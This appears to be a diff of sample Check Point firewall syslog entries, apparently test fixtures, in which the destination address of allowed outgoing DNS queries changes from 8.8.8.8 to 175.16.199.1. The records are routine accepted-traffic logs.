 <134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"88.221.161.169"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51708"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38488"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43459"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38488"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43459"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53304"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e50b,0x14,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.108.173.172"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34546"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53906"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57263"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49422"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53906"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57263"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49422"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54576"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52064"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47527"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43245"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49151"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44720"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33553"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53773"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60019"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57758"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52064"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47527"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43245"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49151"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44720"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33553"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
